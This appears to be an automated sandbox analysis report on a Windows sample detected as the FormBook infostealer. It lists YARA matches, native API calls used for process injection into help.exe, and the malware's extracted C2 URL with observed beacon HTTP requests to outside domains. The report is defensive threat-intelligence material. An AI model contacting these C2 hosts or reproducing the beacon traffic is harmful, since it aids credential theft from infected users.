Source:	Binary string: wntdll.pdbUGP source: GiG35Rwmz6.exe, 00000004.00000002.729465784.000000000108F000.00000040.00000001.sdmp, help.exe, 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: GiG35Rwmz6.exe, 00000004.00000002.729465784.000000000108F000.00000040.00000001.sdmp, help.exe
Source:	Binary string: help.pdbGCTL source: GiG35Rwmz6.exe, 00000004.00000002.729233616.0000000000F60000.00000040.00000001.sdmp
Source:	Binary string: help.pdb source: GiG35Rwmz6.exe, 00000004.00000002.729233616.0000000000F60000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.692755022.0000000005A00000.00000002.00000001.sdmp

Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 4x nop then pop ebx		4_2_00407B0A
Source: C:\Windows\SysWOW64\help.exe	Code function: 4x nop then pop ebx		9_2_02417B0A

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.studiooculto.com/n8ud/

Source: global traffic	HTTP traffic detected: GET /n8ud/?vPE=5jrT8R0&hL=WvvELDNeXjXNSBNWuUY8Zfoe6Ppc+GsA8iptXd2KegdndXiZdpjCN7GBAWkC1K0OIvRU HTTP/1.1Host: www.intentguild.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ud/?hL=xx0OFN/A1LQZVCJMLzEbxnX8OnCdv1d2voKBm1sodMz7PL+00tIAVi4krCco92VzLf77&vPE=5jrT8R0 HTTP/1.1Host: www.didyouswipe.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	ASN Name: IOFLOODUS IOFLOODUS
Source: Joe Sandbox View	ASN Name: DXTL-HKDXTLTseungKwanOServiceHK DXTL-HKDXTLTseungKwanOServiceHK

Source: global traffic	HTTP traffic detected: GET /n8ud/?vPE=5jrT8R0&hL=WvvELDNeXjXNSBNWuUY8Zfoe6Ppc+GsA8iptXd2KegdndXiZdpjCN7GBAWkC1K0OIvRU HTTP/1.1Host: www.intentguild.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n8ud/?hL=xx0OFN/A1LQZVCJMLzEbxnX8OnCdv1d2voKBm1sodMz7PL+00tIAVi4krCco92VzLf77&vPE=5jrT8R0 HTTP/1.1Host: www.didyouswipe.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.intentguild.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 10 Jun 2021 15:55:40 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000005.00000000.680176172.0000000002B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000005.00000000.700601857.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: GiG35Rwmz6.exe, 00000000.00000002.676146629.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000009.00000002.925821980.0000000002410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.729070321.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.728648868.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.729033636.0000000000AD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.676742229.00000000040C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.925566371.00000000000D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.671897283.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 4.0.GiG35Rwmz6.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.GiG35Rwmz6.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.GiG35Rwmz6.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.GiG35Rwmz6.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.GiG35Rwmz6.exe.40c9950.2.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000009.00000002.925821980.0000000002410000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.925821980.0000000002410000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.729070321.0000000000B00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.729070321.0000000000B00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.728648868.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.728648868.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.729033636.0000000000AD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.729033636.0000000000AD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.676742229.00000000040C9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.676742229.00000000040C9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.925566371.00000000000D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.925566371.00000000000D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.671897283.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.671897283.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.0.GiG35Rwmz6.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.0.GiG35Rwmz6.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.GiG35Rwmz6.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.GiG35Rwmz6.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.0.GiG35Rwmz6.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.0.GiG35Rwmz6.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.GiG35Rwmz6.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.GiG35Rwmz6.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.GiG35Rwmz6.exe.40c9950.2.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.GiG35Rwmz6.exe.40c9950.2.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 4_2_0041A060 NtClose,	4_2_0041A060
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 4_2_0041A110 NtAllocateVirtualMemory,	4_2_0041A110
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 4_2_00419F30 NtCreateFile,	4_2_00419F30
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 4_2_00419FE0 NtReadFile,	4_2_00419FE0
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 4_2_0041A05A NtClose,	4_2_0041A05A
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 4_2_0041A10A NtAllocateVirtualMemory,	4_2_0041A10A
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC96E0 NtFreeVirtualMemory,LdrInitializeThunk,	9_2_02AC96E0
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC96D0 NtCreateKey,LdrInitializeThunk,	9_2_02AC96D0
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC9660 NtAllocateVirtualMemory,LdrInitializeThunk,	9_2_02AC9660
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC9650 NtQueryValueKey,LdrInitializeThunk,	9_2_02AC9650
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC9A50 NtCreateFile,LdrInitializeThunk,	9_2_02AC9A50
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC9780 NtMapViewOfSection,LdrInitializeThunk,	9_2_02AC9780
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC9FE0 NtCreateMutant,LdrInitializeThunk,	9_2_02AC9FE0
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC9710 NtQueryInformationToken,LdrInitializeThunk,	9_2_02AC9710
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC9860 NtQuerySystemInformation,LdrInitializeThunk,	9_2_02AC9860
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC9840 NtDelayExecution,LdrInitializeThunk,	9_2_02AC9840
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC99A0 NtCreateSection,LdrInitializeThunk,	9_2_02AC99A0
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC95D0 NtClose,LdrInitializeThunk,	9_2_02AC95D0
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	9_2_02AC9910
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC9540 NtReadFile,LdrInitializeThunk,	9_2_02AC9540
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC9A80 NtOpenDirectoryObject,	9_2_02AC9A80
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC9A20 NtResumeThread,	9_2_02AC9A20
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC9A00 NtProtectVirtualMemory,	9_2_02AC9A00
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC9610 NtEnumerateValueKey,	9_2_02AC9610
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC9A10 NtQuerySection,	9_2_02AC9A10
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC9670 NtQueryInformationProcess,	9_2_02AC9670
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC97A0 NtUnmapViewOfSection,	9_2_02AC97A0
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02ACA3B0 NtGetContextThread,	9_2_02ACA3B0
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC9730 NtQueryVirtualMemory,	9_2_02AC9730
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC9B00 NtSetValueKey,	9_2_02AC9B00
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02ACA710 NtOpenProcessToken,	9_2_02ACA710
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC9760 NtOpenProcess,	9_2_02AC9760
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC9770 NtSetInformationFile,	9_2_02AC9770
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02ACA770 NtOpenThread,	9_2_02ACA770
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC98A0 NtWriteVirtualMemory,	9_2_02AC98A0
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC98F0 NtReadVirtualMemory,	9_2_02AC98F0
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC9820 NtEnumerateKey,	9_2_02AC9820
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02ACB040 NtSuspendThread,	9_2_02ACB040
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC95F0 NtQueryInformationFile,	9_2_02AC95F0
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC99D0 NtCreateProcessEx,	9_2_02AC99D0
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC9520 NtWaitForSingleObject,	9_2_02AC9520
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02ACAD30 NtSetContextThread,	9_2_02ACAD30
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC9560 NtWriteFile,	9_2_02AC9560
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AC9950 NtQueueApcThread,	9_2_02AC9950
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_0242A060 NtClose,	9_2_0242A060
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_0242A110 NtAllocateVirtualMemory,	9_2_0242A110
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02429F30 NtCreateFile,	9_2_02429F30
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02429FE0 NtReadFile,	9_2_02429FE0
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_0242A05A NtClose,	9_2_0242A05A
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_0242A10A NtAllocateVirtualMemory,	9_2_0242A10A

Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_00C82160	0_2_00C82160
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_00C81790	0_2_00C81790
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_00C8E7B8	0_2_00C8E7B8
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_00C85770	0_2_00C85770
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_00C80FF0	0_2_00C80FF0
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_00C850F8	0_2_00C850F8
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_00C82151	0_2_00C82151
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_00C85108	0_2_00C85108
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_00C85301	0_2_00C85301
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_00C85310	0_2_00C85310
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_00C80480	0_2_00C80480
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_00C80479	0_2_00C80479
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_00C85548	0_2_00C85548
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_00C85558	0_2_00C85558
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_00C81781	0_2_00C81781
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_00C85760	0_2_00C85760
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_00C84A69	0_2_00C84A69
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_00C84A78	0_2_00C84A78
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_00C84D69	0_2_00C84D69
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_00C83E80	0_2_00C83E80
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_00C83E71	0_2_00C83E71
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_00C80F48	0_2_00C80F48
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F309A0	0_2_09F309A0
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F3D288	0_2_09F3D288
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F39E14	0_2_09F39E14
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F30990	0_2_09F30990
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F39850	0_2_09F39850
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F35858	0_2_09F35858
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F39840	0_2_09F39840
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F35849	0_2_09F35849
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F30012	0_2_09F30012
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F373C0	0_2_09F373C0
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F373BD	0_2_09F373BD
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F35BA3	0_2_09F35BA3
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F34BA2	0_2_09F34BA2
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F30398	0_2_09F30398
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F30389	0_2_09F30389
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F35358	0_2_09F35358
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F35348	0_2_09F35348
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F35AF7	0_2_09F35AF7
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F35AF8	0_2_09F35AF8
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F34AC0	0_2_09F34AC0
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F34ABF	0_2_09F34ABF
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F30580	0_2_09F30580
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F37584	0_2_09F37584
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F30571	0_2_09F30571
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F36D61	0_2_09F36D61
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F36D68	0_2_09F36D68
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F31497	0_2_09F31497
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F31498	0_2_09F31498
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F39C57	0_2_09F39C57
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F39C58	0_2_09F39C58
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F35C31	0_2_09F35C31
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F307C0	0_2_09F307C0
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F307B0	0_2_09F307B0
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F33720	0_2_09F33720
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F39E83	0_2_09F39E83
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 0_2_09F39E65	0_2_09F39E65
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 4_2_00401030	4_2_00401030
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 4_2_0041E1CF	4_2_0041E1CF
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 4_2_0041D23B	4_2_0041D23B
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 4_2_00402D87	4_2_00402D87
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 4_2_00402D90	4_2_00402D90
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 4_2_00409E40	4_2_00409E40
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 4_2_0041D6CF	4_2_0041D6CF
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 4_2_00402FB0	4_2_00402FB0
Source: C:\Users\user\Desktop\GiG35Rwmz6.exe	Code function: 4_2_0041BFB6	4_2_0041BFB6
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AA6E30	9_2_02AA6E30
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02ABEBB0	9_2_02ABEBB0
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A9B090	9_2_02A9B090
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B41002	9_2_02B41002
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A9841F	9_2_02A9841F
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AB2581	9_2_02AB2581
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A9D5E0	9_2_02A9D5E0
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A80D20	9_2_02A80D20
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02AA4120	9_2_02AA4120
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02A8F900	9_2_02A8F900
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02B51D55	9_2_02B51D55
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_0242D23B	9_2_0242D23B
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_0242E1CF	9_2_0242E1CF
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02419E40	9_2_02419E40
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02412FB0	9_2_02412FB0
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_0242BFB6	9_2_0242BFB6
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02412D87	9_2_02412D87
Source: C:\Windows\SysWOW64\help.exe	Code function: 9_2_02412D90	9_2_02412D90

Source: C:\Windows\SysWOW64\help.exe

Code function: String function: 02A8B150 appears 32 times

Source: GiG35Rwmz6.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: GiG35Rwmz6.exe	Binary or memory string: OriginalFilename vs GiG35Rwmz6.exe
Source: GiG35Rwmz6.exe, 00000000.00000002.679951755.0000000007EB0000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameDSASignature.dll@ vs GiG35Rwmz6.exe
Source: GiG35Rwmz6.exe, 00000000.00000000.661313043.00000000004A2000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameIDispatch.exeH vs GiG35Rwmz6.exe
Source: GiG35Rwmz6.exe, 00000000.00000002.676742229.00000000040C9000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameKygo.dll* vs GiG35Rwmz6.exe
Source: GiG35Rwmz6.exe, 00000004.00000002.729162060.0000000000B56000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenameHelp.Exej% vs GiG35Rwmz6.exe
Source: GiG35Rwmz6.exe, 00000004.00000002.729465784.000000000108F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs GiG35Rwmz6.exe
Source: GiG35Rwmz6.exe, 00000004.00000000.671606108.0000000000512000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameIDispatch.exeH vs GiG35Rwmz6.exe
Source: GiG35Rwmz6.exe	Binary or memory string: OriginalFilenameIDispatch.exeH vs GiG35Rwmz6.exe

